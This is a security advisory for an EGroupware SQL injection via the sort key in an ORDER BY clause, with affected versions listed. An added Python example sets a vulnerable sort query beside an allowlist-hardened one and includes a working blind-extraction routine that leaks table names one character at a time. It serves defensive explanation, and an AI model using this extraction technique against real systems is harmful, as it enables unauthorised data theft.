GHSA-phg7-8mm9-gj88

Source
https://github.com/advisories/GHSA-phg7-8mm9-gj88
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-phg7-8mm9-gj88/GHSA-phg7-8mm9-gj88.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-phg7-8mm9-gj88
Aliases
Published
2024-07-07T15:31:12Z
Modified
2024-11-28T05:39:23.928893Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
  • 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Summary
EGroupware mishandles an ORDER BY clause
Details

EGroupware before 23.1.20240624 mishandles an ORDER BY clause. The sort key submitted to json.php with menuaction=EGroupware\Api\Etemplate\Widget\Nextmatch::ajax_get_rows (the sort.id value used for Address Book or InfoLog sorting) is used to build the ORDER BY clause, which gives authenticated users an SQL injection. Note that the two CVSS vectors above disagree on the privilege required (PR:L in the v3.1 vector, PR:N in the v4.0 vector); the description itself states that the injection is reachable by authenticated users. The fix is in 23.1.20240624; all earlier versions are affected.
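The injection class named above (a client-controlled sort key reaching an ORDER BY clause), as an added example that is not EGroupware's code and not part of the advisory: a constructed SQLite address-book table, the vulnerable pattern beside an allowlist-hardened version, and a boolean-based blind probe showing why the row ordering itself is an oracle. The table, column and function names (contacts, n_given, n_family, fetch_rows_vulnerable, fetch_rows_hardened, oracle_payload) are assumptions for illustration, and the rows are constructed sample data.

```python
import sqlite3

# Constructed sample table standing in for an address-book list; not EGroupware's schema.
ROWS = [
    ("Zoe", "Adams", "zoe@example.org"),
    ("Adam", "Zimmer", "adam@example.org"),
    ("Mia", "Klein", "mia@example.org"),
]

# Columns a client is allowed to sort on, and the only two directions accepted.
SORTABLE = {"n_given", "n_family", "email"}
ORDERS = {"ASC", "DESC"}


def open_db():
    """In-memory SQLite database seeded with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE contacts (n_given TEXT, n_family TEXT, email TEXT)")
    con.executemany("INSERT INTO contacts VALUES (?, ?, ?)", ROWS)
    return con


def fetch_rows_vulnerable(con, sort_id, order="ASC"):
    """The flaw class: a caller-supplied sort key is pasted into ORDER BY.

    Bound parameters ('?') cannot carry identifiers, so the usual fix for
    WHERE-clause injection does not apply here; the value must be validated.
    """
    sql = f"SELECT n_given, n_family FROM contacts ORDER BY {sort_id} {order}"
    return con.execute(sql).fetchall()


def fetch_rows_hardened(con, sort_id, order="ASC"):
    """Same query, but the sort key and direction are checked against an allowlist.

    Unknown values are rejected outright rather than escaped: there is no
    portable way to quote an arbitrary identifier into an ORDER BY.
    """
    if sort_id not in SORTABLE:
        raise ValueError(f"unsortable column: {sort_id!r}")
    order = order.upper()
    if order not in ORDERS:
        raise ValueError(f"bad sort order: {order!r}")
    sql = f"SELECT n_given, n_family FROM contacts ORDER BY {sort_id} {order}"
    return con.execute(sql).fetchall()


def oracle_payload(condition):
    """Boolean-based blind probe for an ORDER BY sink: the sort column itself
    depends on whether `condition` is true, so the row order leaks one bit."""
    return f"(CASE WHEN ({condition}) THEN n_given ELSE n_family END)"


def leak_bit(fetch, con, condition):
    """Return True if `condition` evaluated true inside the database.

    Sorted by n_given the first row is Adam; sorted by n_family it is Zoe
    (Adams), so the first given name tells the two orderings apart.
    """
    rows = fetch(con, oracle_payload(condition))
    return rows[0][0] == "Adam"


def hardened_rejects(con, sort_id):
    """True if the hardened fetch refuses the given sort key."""
    try:
        fetch_rows_hardened(con, sort_id)
    except ValueError:
        return True
    return False


def extract_table_name(con, max_len=16):
    """Recover the first object name from sqlite_master one character at a
    time through the vulnerable sink, the way a blind attacker would."""
    name = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in "abcdefghijklmnopqrstuvwxyz_":
            cond = f"substr((SELECT name FROM sqlite_master LIMIT 1), {pos}, 1) = '{ch}'"
            if leak_bit(fetch_rows_vulnerable, con, cond):
                found = ch
                break
        if found is None:
            break
        name += found
    return name


if __name__ == "__main__":
    db = open_db()
    print("leaked table name:", extract_table_name(db))
    print("hardened rejects payload:", hardened_rejects(db, oracle_payload("1=1")))
```

The point of the probe is that an ORDER BY sink needs no error message and no data in the response body to be exploitable: the attacker only compares which record comes first. The allowlist in fetch_rows_hardened is the check to look for when auditing any "sort by column" parameter, since placeholders cannot bind column names.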

Database specific
{
    "nvd_published_at": "2024-07-07T15:15:09Z",
    "cwe_ids": [
        "CWE-89"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-08T15:00:36Z"
}
References

Affected packages

Packagist / egroupware/egroupware

Package

Name
egroupware/egroupware
Purl
pkg:composer/egroupware/egroupware

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
23.1.20240624

Affected versions

14.*

14.2.20150121
14.2.20150206
14.2.20150210
14.2.20150212
14.2.20150218
14.2.20150310
14.2.20150402
14.2.20150421
14.2.20150428
14.2.20150429
14.2.20150501
14.2.20150603
14.2.20150707
14.2.20150717
14.3.20150728
14.3.20150729
14.3.20150811
14.3.20150821
14.3.20150826
14.3.20150908
14.3.20151012
14.3.20151027
14.3.20151028
14.3.20151029
14.3.20151030
14.3.20151110
14.3.20151130
14.3.20151201
14.3.20160112
14.3.20160113
14.3.20160304
14.3.20160428
14.3.20160512
14.3.20160522
14.3.20160524
14.3.20160525
14.3.20160708

16.*

16.1.20160603
16.1.20160621
16.1.20160627
16.1.20160630
16.1.20160708
16.1.20160715
16.1.20160801
16.1.20160810
16.1.20160905
16.1.20161006
16.1.20161102
16.1.20161107
16.1.20161208
16.1.20170118
16.1.20170203
16.1.20170315
16.1.20170415
16.1.20170612
16.1.20170613
16.1.20170703
16.1.20170922
16.1.20171106
16.1.20180116
16.1.20180130

17.*

17.1.20171023
17.1.20171106
17.1.20171115
17.1.20171129
17.1.20171130
17.1.20171218
17.1.20180118
17.1.20180130
17.1.20180209
17.1.20180321
17.1.20180413
17.1.20180523
17.1.20180625
17.1.20180720
17.1.20180831
17.1.20181018
17.1.20181204
17.1.20181205
17.1.20190111
17.1.20190214
17.1.20190222
17.1.20190402
17.1.20190529
17.1.20190808

19.*

19.1.20190716
19.1.20190717
19.1.20190726
19.1.20190806
19.1.20190813
19.1.20190822
19.1.20190917
19.1.20190925
19.1.20191031
19.1.20191119
19.1.20191220
19.1.20200130
19.1.20200318
19.1.20200409
19.1.20200430
19.1.20200605
19.1.20200701

20.*

20.1.20200525
20.1.20200613
20.1.20200628
20.1.20200710
20.1.20200716
20.1.20200728
20.1.20200731
20.1.20200810
20.1.20200812
20.1.20200818
20.1.20200901
20.1.20200914
20.1.20201005
20.1.20201020
20.1.20201028
20.1.20201202
20.1.20201217
20.1.20210125
20.1.20210324
20.1.20210503

21.*

21.1.20210318
21.1.20210329
21.1.20210406
21.1.20210420
21.1.20210504
21.1.20210521
21.1.20210629
21.1.20210723
21.1.20210923
21.1.20211130
21.1.20220207
21.1.20220406
21.1.20220408
21.1.20220905
21.1.20220916
21.1.20221202
21.1.20230210

22.*

22.1.20220920

23.*

23.1.20230110
23.1.20230114
23.1.20230125
23.1.20230210
23.1.20230228
23.1.20230314
23.1.20230328
23.1.20230412
23.1.20230428
23.1.20230503
23.1.20230524
23.1.20230620
23.1.20230726
23.1.20230728
23.1.20230824
23.1.20230911
23.1.20231110
23.1.20231122
23.1.20231129
23.1.20231201
23.1.20231219
23.1.20231220
23.1.20240125
23.1.20240304
23.1.20240430